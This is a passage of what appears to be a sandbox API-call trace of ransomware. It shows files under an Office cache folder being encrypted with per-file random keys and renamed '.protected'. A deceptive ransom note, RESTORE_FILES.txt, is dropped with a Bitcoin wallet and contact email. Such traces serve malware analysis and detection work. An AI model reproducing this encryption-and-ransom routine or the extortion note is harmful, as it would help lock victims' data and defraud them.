Information") returned -1 [0054.683] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0054.683] StrStrIW (lpFirst="Proof.xml", lpSrch=".protected") returned 0x0 [0054.683] lstrcmpW (lpString1="Proof.xml", lpString2="RESTORE_FILES.txt") returned -1 [0054.683] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0054.683] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0054.683] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0054.683] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0054.683] StrStrW (lpFirst="Proof.xml", lpSrch=".txt") returned 0x0 [0054.683] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0054.683] StrStrW (lpFirst="Proof.xml", lpSrch=".rar") returned 0x0 [0054.683] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml") returned 85 [0054.683] StrStrW (lpFirst="Proof.xml", lpSrch=".zip") returned 0x0 [0054.683] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x543, lpOverlapped=0x0) returned 1 [0054.697] SetFilePointerEx (in: hFile=0x150, 
liDistanceToMove=0xfffffabd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.697] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x543, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x543, lpOverlapped=0x0) returned 1 [0054.697] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.698] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0054.699] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0054.699] CloseHandle (hObject=0x150) returned 1 [0054.700] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.protected") returned 95 [0054.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml.protected")) returned 1 [0054.707] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0054.707] FindClose (in: hFindFile=0x4a9270 | out: hFindFile=0x4a9270) returned 1 [0054.707] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\RESTORE_FILES.txt") returned 93 [0054.707] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0054.707] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0054.707] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0054.708] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0054.708] WriteFile (in: hFile=0xb4, 
lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0054.708] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0054.708] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0054.708] CloseHandle (hObject=0xb4) returned 1 [0054.709] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0054.709] lstrcmpiW (lpString1="Proof.es", lpString2="Windows") returned -1 [0054.709] lstrcmpiW (lpString1="Proof.es", lpString2="Program Files") returned 1 [0054.709] lstrcmpiW (lpString1="Proof.es", lpString2="Program Files (x86)") returned 1 [0054.709] lstrcmpiW (lpString1="Proof.es", lpString2="$Recycle.bin") returned 1 [0054.709] lstrcmpiW (lpString1="Proof.es", lpString2="System Volume Information") returned -1 [0054.709] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es") returned 75 [0054.709] lstrcmpW (lpString1="Proof.es", lpString2=".") returned 1 [0054.709] lstrcmpW (lpString1="Proof.es", lpString2="..") returned 1 [0054.709] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*") returned 77 [0054.709] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x4a9270 [0054.709] lstrcmpiW 
(lpString1=".", lpString2="Windows") returned -1 [0054.709] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0054.709] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0054.709] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0054.709] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0054.709] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\.") returned 77 [0054.709] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0054.709] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0054.709] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0054.709] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0054.709] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0054.709] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0054.709] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0054.710] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\..") returned 78 [0054.710] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0054.710] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0054.710] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0054.710] lstrcmpiW (lpString1="Proof.cab", lpString2="Windows") returned -1 [0054.710] lstrcmpiW (lpString1="Proof.cab", lpString2="Program Files") returned 1 [0054.710] lstrcmpiW (lpString1="Proof.cab", lpString2="Program Files (x86)") returned 1 [0054.710] lstrcmpiW (lpString1="Proof.cab", lpString2="$Recycle.bin") returned 1 [0054.710] lstrcmpiW (lpString1="Proof.cab", lpString2="System Volume Information") 
returned -1 [0054.710] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0054.710] StrStrIW (lpFirst="Proof.cab", lpSrch=".protected") returned 0x0 [0054.710] lstrcmpW (lpString1="Proof.cab", lpString2="RESTORE_FILES.txt") returned -1 [0054.710] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0054.710] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0054.710] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0054.711] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0054.711] StrStrW (lpFirst="Proof.cab", lpSrch=".txt") returned 0x0 [0054.711] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0054.711] StrStrW (lpFirst="Proof.cab", lpSrch=".rar") returned 0x0 [0054.711] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab") returned 85 [0054.711] StrStrW (lpFirst="Proof.cab", lpSrch=".zip") returned 0x0 [0054.711] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0054.720] SetFilePointerEx (in: hFile=0x150, 
liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0054.720] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0054.720] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.720] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0054.759] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0054.759] CloseHandle (hObject=0x150) returned 1 [0055.273] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.protected") returned 95 [0055.273] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab.protected")) returned 1 [0055.273] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0055.273] lstrcmpiW (lpString1="Proof.msi", lpString2="Windows") returned -1 [0055.273] lstrcmpiW (lpString1="Proof.msi", lpString2="Program Files") returned 1 
[0055.273] lstrcmpiW (lpString1="Proof.msi", lpString2="Program Files (x86)") returned 1 [0055.273] lstrcmpiW (lpString1="Proof.msi", lpString2="$Recycle.bin") returned 1 [0055.273] lstrcmpiW (lpString1="Proof.msi", lpString2="System Volume Information") returned -1 [0055.273] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0055.273] StrStrIW (lpFirst="Proof.msi", lpSrch=".protected") returned 0x0 [0055.273] lstrcmpW (lpString1="Proof.msi", lpString2="RESTORE_FILES.txt") returned -1 [0055.273] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0055.273] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0055.274] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0055.274] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0055.274] StrStrW (lpFirst="Proof.msi", lpSrch=".txt") returned 0x0 [0055.274] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0055.274] StrStrW (lpFirst="Proof.msi", lpSrch=".rar") returned 0x0 [0055.274] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi") returned 85 [0055.274] StrStrW (lpFirst="Proof.msi", lpSrch=".zip") returned 0x0 [0055.274] ReadFile (in: 
hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0055.275] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0055.276] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0055.276] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.276] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0055.295] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0055.295] CloseHandle (hObject=0x150) returned 1 [0055.328] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.protected") returned 95 [0055.328] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.msi.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.msi.protected")) returned 1 [0055.328] FindNextFileW (in: 
hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0055.328] lstrcmpiW (lpString1="Proof.xml", lpString2="Windows") returned -1 [0055.328] lstrcmpiW (lpString1="Proof.xml", lpString2="Program Files") returned 1 [0055.329] lstrcmpiW (lpString1="Proof.xml", lpString2="Program Files (x86)") returned 1 [0055.329] lstrcmpiW (lpString1="Proof.xml", lpString2="$Recycle.bin") returned 1 [0055.329] lstrcmpiW (lpString1="Proof.xml", lpString2="System Volume Information") returned -1 [0055.329] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0055.329] StrStrIW (lpFirst="Proof.xml", lpSrch=".protected") returned 0x0 [0055.329] lstrcmpW (lpString1="Proof.xml", lpString2="RESTORE_FILES.txt") returned -1 [0055.329] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0055.329] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295eee4*=0x30) returned 1 [0055.329] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0055.329] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0055.329] StrStrW (lpFirst="Proof.xml", lpSrch=".txt") returned 0x0 [0055.329] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0055.329] StrStrW (lpFirst="Proof.xml", lpSrch=".rar") 
returned 0x0 [0055.329] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml") returned 85 [0055.329] StrStrW (lpFirst="Proof.xml", lpSrch=".zip") returned 0x0 [0055.329] ReadFile (in: hFile=0x150, lpBuffer=0x4acae0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesRead=0x295ef04*=0x5b1, lpOverlapped=0x0) returned 1 [0055.380] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0055.381] WriteFile (in: hFile=0x150, lpBuffer=0x4acae0*, nNumberOfBytesToWrite=0x5b1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4acae0*, lpNumberOfBytesWritten=0x295ef04*=0x5b1, lpOverlapped=0x0) returned 1 [0055.381] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0055.381] WriteFile (in: hFile=0x150, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0055.381] WriteFile (in: hFile=0x150, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0055.381] CloseHandle (hObject=0x150) returned 1 [0055.384] wnsprintfW (in: pszDest=0x4acae0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.protected") returned 95 [0055.384] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml"), 
lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml.protected")) returned 1 [0055.391] FindNextFileW (in: hFindFile=0x4a9270, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0055.391] FindClose (in: hFindFile=0x4a9270 | out: hFindFile=0x4a9270) returned 1 [0055.391] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\RESTORE_FILES.txt") returned 93 [0055.391] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\RESTORE_FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0055.392] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0055.392] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, 